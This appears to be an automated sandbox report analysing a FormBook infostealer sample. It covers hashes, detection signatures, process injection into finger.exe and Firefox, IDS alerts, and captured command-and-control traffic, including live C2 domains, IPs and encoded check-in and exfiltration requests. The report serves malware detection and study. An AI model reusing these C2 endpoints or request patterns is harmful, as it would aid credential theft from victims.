Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
72STaC6BmljfbIQ.exe

Overview

General Information

Sample name:72STaC6BmljfbIQ.exe
Analysis ID:1567386
MD5:a8058bb3809176bc3ee9e52df4960f87
SHA1:e417d18ba2bc63b1f4cc4d915e611aa963c1aec4
SHA256:04f2a2c8f4f414e1d33b5f2c3d8a0a3d915d5bb155914f16aec22e31e0ab2ebd
Tags:exeuser-abuse_ch
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • 72STaC6BmljfbIQ.exe (PID: 7760 cmdline: "C:\Users\user\Desktop\72STaC6BmljfbIQ.exe" MD5: A8058BB3809176BC3EE9E52DF4960F87)
    • 72STaC6BmljfbIQ.exe (PID: 8112 cmdline: "C:\Users\user\Desktop\72STaC6BmljfbIQ.exe" MD5: A8058BB3809176BC3EE9E52DF4960F87)
    • 72STaC6BmljfbIQ.exe (PID: 8120 cmdline: "C:\Users\user\Desktop\72STaC6BmljfbIQ.exe" MD5: A8058BB3809176BC3EE9E52DF4960F87)
    • 72STaC6BmljfbIQ.exe (PID: 8136 cmdline: "C:\Users\user\Desktop\72STaC6BmljfbIQ.exe" MD5: A8058BB3809176BC3EE9E52DF4960F87)
      • PWhloTdOLAusO.exe (PID: 1748 cmdline: "C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • finger.exe (PID: 7428 cmdline: "C:\Windows\SysWOW64\finger.exe" MD5: C586D06BF5D5B3E6E9E3289F6AA8225E)
          • PWhloTdOLAusO.exe (PID: 5268 cmdline: "C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 5828 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000008.00000002.3268946749.0000000002AB0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000008.00000002.3268484619.00000000005F0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000006.00000002.1924713892.00000000010C0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000006.00000002.1924159868.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          0000000B.00000002.3270119796.0000000000820000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 4 entries
            SourceRuleDescriptionAuthorStrings
            6.2.72STaC6BmljfbIQ.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              6.2.72STaC6BmljfbIQ.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
                No Sigma rule has matched
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-03T14:15:52.396161+010020507451Malware Command and Control Activity Detected192.168.2.849713172.67.218.14680TCP
                2024-12-03T14:16:17.694627+010020507451Malware Command and Control Activity Detected192.168.2.849717178.172.160.3080TCP
                2024-12-03T14:16:32.676062+010020507451Malware Command and Control Activity Detected192.168.2.849721194.58.112.17480TCP
                2024-12-03T14:16:48.425225+010020507451Malware Command and Control Activity Detected192.168.2.849725134.122.191.18780TCP
                2024-12-03T14:17:04.451571+010020507451Malware Command and Control Activity Detected192.168.2.849729156.234.28.10180TCP
                2024-12-03T14:17:19.301185+010020507451Malware Command and Control Activity Detected192.168.2.849733209.74.79.4280TCP
                2024-12-03T14:17:34.812705+010020507451Malware Command and Control Activity Detected192.168.2.849737208.91.197.2780TCP
                2024-12-03T14:17:50.260075+010020507451Malware Command and Control Activity Detected192.168.2.849741185.101.158.11380TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-03T14:15:52.396161+010028554651A Network Trojan was detected192.168.2.849713172.67.218.14680TCP
                2024-12-03T14:16:17.694627+010028554651A Network Trojan was detected192.168.2.849717178.172.160.3080TCP
                2024-12-03T14:16:32.676062+010028554651A Network Trojan was detected192.168.2.849721194.58.112.17480TCP
                2024-12-03T14:16:48.425225+010028554651A Network Trojan was detected192.168.2.849725134.122.191.18780TCP
                2024-12-03T14:17:04.451571+010028554651A Network Trojan was detected192.168.2.849729156.234.28.10180TCP
                2024-12-03T14:17:19.301185+010028554651A Network Trojan was detected192.168.2.849733209.74.79.4280TCP
                2024-12-03T14:17:34.812705+010028554651A Network Trojan was detected192.168.2.849737208.91.197.2780TCP
                2024-12-03T14:17:50.260075+010028554651A Network Trojan was detected192.168.2.849741185.101.158.11380TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-03T14:16:09.697614+010028554641A Network Trojan was detected192.168.2.849714178.172.160.3080TCP
                2024-12-03T14:16:12.321713+010028554641A Network Trojan was detected192.168.2.849715178.172.160.3080TCP
                2024-12-03T14:16:15.032437+010028554641A Network Trojan was detected192.168.2.849716178.172.160.3080TCP
                2024-12-03T14:16:24.651040+010028554641A Network Trojan was detected192.168.2.849718194.58.112.17480TCP
                2024-12-03T14:16:27.379763+010028554641A Network Trojan was detected192.168.2.849719194.58.112.17480TCP
                2024-12-03T14:16:30.070445+010028554641A Network Trojan was detected192.168.2.849720194.58.112.17480TCP
                2024-12-03T14:16:40.180012+010028554641A Network Trojan was detected192.168.2.849722134.122.191.18780TCP
                2024-12-03T14:16:42.851950+010028554641A Network Trojan was detected192.168.2.849723134.122.191.18780TCP
                2024-12-03T14:16:45.554922+010028554641A Network Trojan was detected192.168.2.849724134.122.191.18780TCP
                2024-12-03T14:16:56.414347+010028554641A Network Trojan was detected192.168.2.849726156.234.28.10180TCP
                2024-12-03T14:16:59.070611+010028554641A Network Trojan was detected192.168.2.849727156.234.28.10180TCP
                2024-12-03T14:17:01.749095+010028554641A Network Trojan was detected192.168.2.849728156.234.28.10180TCP
                2024-12-03T14:17:11.302027+010028554641A Network Trojan was detected192.168.2.849730209.74.79.4280TCP
                2024-12-03T14:17:13.915538+010028554641A Network Trojan was detected192.168.2.849731209.74.79.4280TCP
                2024-12-03T14:17:16.650100+010028554641A Network Trojan was detected192.168.2.849732209.74.79.4280TCP
                2024-12-03T14:17:26.277793+010028554641A Network Trojan was detected192.168.2.849734208.91.197.2780TCP
                2024-12-03T14:17:28.977442+010028554641A Network Trojan was detected192.168.2.849735208.91.197.2780TCP
                2024-12-03T14:17:31.687756+010028554641A Network Trojan was detected192.168.2.849736208.91.197.2780TCP
                2024-12-03T14:17:42.176033+010028554641A Network Trojan was detected192.168.2.849738185.101.158.11380TCP
                2024-12-03T14:17:44.847594+010028554641A Network Trojan was detected192.168.2.849739185.101.158.11380TCP
                2024-12-03T14:17:47.540609+010028554641A Network Trojan was detected192.168.2.849740185.101.158.11380TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: https://00808.vip/Avira URL Cloud: Label: malware
                Source: 72STaC6BmljfbIQ.exeReversingLabs: Detection: 57%
                Source: Yara matchFile source: 6.2.72STaC6BmljfbIQ.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.72STaC6BmljfbIQ.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000008.00000002.3268946749.0000000002AB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3268484619.00000000005F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.1924713892.00000000010C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.1924159868.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3270119796.0000000000820000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3269214362.0000000002B00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.1926555511.00000000014A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3269604587.00000000023E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: 72STaC6BmljfbIQ.exeJoe Sandbox ML: detected
                Source: 72STaC6BmljfbIQ.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 72STaC6BmljfbIQ.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: finger.pdb source: 72STaC6BmljfbIQ.exe, 00000006.00000002.1924475364.0000000000CF8000.00000004.00000020.00020000.00000000.sdmp, PWhloTdOLAusO.exe, 00000007.00000002.3269044593.0000000000758000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: PWhloTdOLAusO.exe, 00000007.00000002.3269332968.0000000000C2E000.00000002.00000001.01000000.0000000C.sdmp, PWhloTdOLAusO.exe, 0000000B.00000000.1996112338.0000000000C2E000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: wntdll.pdbUGP source: 72STaC6BmljfbIQ.exe, 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 00000008.00000002.3271087733.000000000314E000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 00000008.00000002.3271087733.0000000002FB0000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 00000008.00000003.1928191608.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 00000008.00000003.1924126889.0000000002C5C000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: 72STaC6BmljfbIQ.exe, 72STaC6BmljfbIQ.exe, 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, finger.exe, finger.exe, 00000008.00000002.3271087733.000000000314E000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 00000008.00000002.3271087733.0000000002FB0000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 00000008.00000003.1928191608.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 00000008.00000003.1924126889.0000000002C5C000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: finger.pdbGCTL source: 72STaC6BmljfbIQ.exe, 00000006.00000002.1924475364.0000000000CF8000.00000004.00000020.00020000.00000000.sdmp, PWhloTdOLAusO.exe, 00000007.00000002.3269044593.0000000000758000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Windows\SysWOW64\finger.exeCode function: 8_2_0060C7B0 FindFirstFileW,FindNextFileW,FindClose,8_2_0060C7B0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 4x nop then xor eax, eax8_2_005F9F20
                Source: C:\Windows\SysWOW64\finger.exeCode function: 4x nop then pop edi8_2_005FE3A1
                Source: C:\Windows\SysWOW64\finger.exeCode function: 4x nop then mov ebx, 00000004h8_2_02ED04BE

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49732 -> 209.74.79.42:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49734 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49727 -> 156.234.28.101:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49728 -> 156.234.28.101:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49720 -> 194.58.112.174:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49736 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49715 -> 178.172.160.30:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49733 -> 209.74.79.42:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49733 -> 209.74.79.42:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49729 -> 156.234.28.101:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49729 -> 156.234.28.101:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49739 -> 185.101.158.113:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49721 -> 194.58.112.174:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49721 -> 194.58.112.174:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49714 -> 178.172.160.30:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49725 -> 134.122.191.187:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49725 -> 134.122.191.187:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49724 -> 134.122.191.187:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49731 -> 209.74.79.42:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49738 -> 185.101.158.113:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49722 -> 134.122.191.187:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49718 -> 194.58.112.174:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49741 -> 185.101.158.113:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49741 -> 185.101.158.113:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49723 -> 134.122.191.187:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49713 -> 172.67.218.146:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49713 -> 172.67.218.146:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49719 -> 194.58.112.174:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49730 -> 209.74.79.42:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49735 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49740 -> 185.101.158.113:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49726 -> 156.234.28.101:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49717 -> 178.172.160.30:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49717 -> 178.172.160.30:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49737 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49737 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49716 -> 178.172.160.30:80
                Source: DNS query: www.pbfgm.xyz
                Source: Joe Sandbox ViewIP Address: 208.91.197.27 208.91.197.27
                Source: Joe Sandbox ViewASN Name: MULTIBAND-NEWHOPEUS MULTIBAND-NEWHOPEUS
                Source: Joe Sandbox ViewASN Name: BCPL-SGBGPNETGlobalASNSG BCPL-SGBGPNETGlobalASNSG
                Source: Joe Sandbox ViewASN Name: BELPAK-ASBELPAKBY BELPAK-ASBELPAKBY
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /fjd6/?uZ9=wvL0WTq0tnld4P&1JgHkl=beVfoldUF3/aok0KBGpVP1gUCt6NMj5apzZJ64FbAFAGDRV4pYz0MK1VY/vkdFXAOWskmP9Sk8tWhxHaAHTK2HRrufKZisD26p6RGVEvaASN7Xi+5siy6qQN86qnR0uMGQ== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.pbfgm.xyzConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /izsd/?1JgHkl=xn6+B8LDUgeEZE/ewkyW9IYT/XMT7FP3Y1kTMJZ4lyb9girANxKziqifoVXMiOJsh7TOAwS+CRcOnA4ABGuIrM8s5EZR8uZbFlAOcv1SbgYYGS8/Ve3tsCmgzp0y8eq9Cg==&uZ9=wvL0WTq0tnld4P HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.phdcoach.proConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /1ne4/?uZ9=wvL0WTq0tnld4P&1JgHkl=Xmf7DtAQ/BnKPHUt3tFFF+cFa+JkL4JTq1FD1Ek4pNpfKYXlmyGrxyMDIrQcVSlaQ+EmZyFY/HlqglCDghJI5hRbnJSY7Fzwy0niAuWJ/cwCJWSeGkVgu4T1N3P5ck3FVA== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.elinor.clubConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /s6zh/?1JgHkl=3lPbUJ/4EMFnMU31nNkM0sT5MNepbRdhjqRifsXJf3a7S0x2d/GglTvwUDIMpGCMSyBp4aVeuGLlN5/zkDRsMIJvPVmvlNwG1HEhIOCZ2tdwLUOtnvozCQbX7z6vra7jTg==&uZ9=wvL0WTq0tnld4P HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.smalleyes.icuConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /dp9c/?1JgHkl=fIUCD8Yz2nphKcMxyO4tlSIcMJ/+EEeHC1g1rmDhwR9J1RiwCtlWpXo9Zxpli6GkENLWknkKup+McE28ApWDIV/QPDMFPo3/M02rRc2bBu1CVBDCQC56E21kZNcAcsBmiQ==&uZ9=wvL0WTq0tnld4P HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.btblxhh.topConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /b8eq/?1JgHkl=gCO4eBiOGzjIUF4Ojd1mJSXRG6iw/sOo1+eSlxtvQuGR+yQgcmFlfWYEu8/uSxX90okqxX/f1dseedlMe+CxDBcOFJwWRQ35vHrygTRMD3WsSY1KHoe5ieZg+FRRJHZJBA==&uZ9=wvL0WTq0tnld4P HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.primespot.liveConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /e1ut/?uZ9=wvL0WTq0tnld4P&1JgHkl=fGTNjk6zk5H6mZem55oD5grLw/UWVVRjfCwqsuvIEvy1a98DW/HAQiAN9onJYw2/Zx4HIDjcQpN8hNtj+4iq978UInban7m5bgNeGe1Bvvfx4xUX/Ch8llqthzcuqNnDWQ== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.mohawktooldie.onlineConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /y54z/?1JgHkl=oqT6mesMFtjVx9Zo+WJYx+2EviEW1FInvVPBS1/+zHYUGg1LXtrFdHCKa7buL2o/Gnc6meWbbP401AFPslg2ZPd0sXm+50uRZ80dRU59tTW2JoKfzEPgRpmu9XiZqkNmHw==&uZ9=wvL0WTq0tnld4P HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.graviton.energyConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                Source: global trafficDNS traffic detected: DNS query: www.pbfgm.xyz
                Source: global trafficDNS traffic detected: DNS query: www.phdcoach.pro
                Source: global trafficDNS traffic detected: DNS query: www.elinor.club
                Source: global trafficDNS traffic detected: DNS query: www.smalleyes.icu
                Source: global trafficDNS traffic detected: DNS query: www.btblxhh.top
                Source: global trafficDNS traffic detected: DNS query: www.primespot.live
                Source: global trafficDNS traffic detected: DNS query: www.mohawktooldie.online
                Source: global trafficDNS traffic detected: DNS query: www.graviton.energy
                Source: unknownHTTP traffic detected: POST /izsd/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USAccept-Encoding: gzip, deflate, brHost: www.phdcoach.proOrigin: http://www.phdcoach.proContent-Type: application/x-www-form-urlencodedConnection: closeContent-Length: 207Cache-Control: no-cacheReferer: http://www.phdcoach.pro/izsd/User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36Data Raw: 31 4a 67 48 6b 6c 3d 38 6c 53 65 43 4a 58 2b 51 68 47 68 59 33 6e 6a 34 6c 53 43 35 50 59 63 30 46 4a 4c 67 33 50 4d 64 69 77 53 47 35 39 78 7a 77 76 51 32 77 7a 48 41 43 57 38 33 4a 33 4a 72 51 2b 53 68 71 63 62 67 2b 2b 4e 49 44 32 78 49 48 30 4e 34 67 6b 6f 53 6a 76 74 70 2f 49 41 68 55 45 4e 32 70 46 73 4c 46 38 55 65 4d 56 55 46 44 5a 59 43 55 30 50 65 63 6a 68 35 46 32 34 32 34 39 4f 39 2b 6e 6b 55 42 6c 4c 6e 69 43 32 6b 4d 72 79 62 6e 76 74 42 67 2b 2f 59 48 62 6d 2b 53 38 6c 67 61 50 52 61 76 77 58 67 72 31 57 6b 6e 49 35 43 41 4e 75 63 31 63 4b 76 46 6e 6e 77 59 7a 79 44 64 41 62 6b 74 69 77 69 6d 6f 3d Data Ascii: 1JgHkl=8lSeCJX+QhGhY3nj4lSC5PYc0FJLg3PMdiwSG59xzwvQ2wzHACW83J3JrQ+Shqcbg++NID2xIH0N4gkoSjvtp/IAhUEN2pFsLF8UeMVUFDZYCU0Pecjh5F24249O9+nkUBlLniC2kMrybnvtBg+/YHbm+S8lgaPRavwXgr1WknI5CANuc1cKvFnnwYzyDdAbktiwimo=
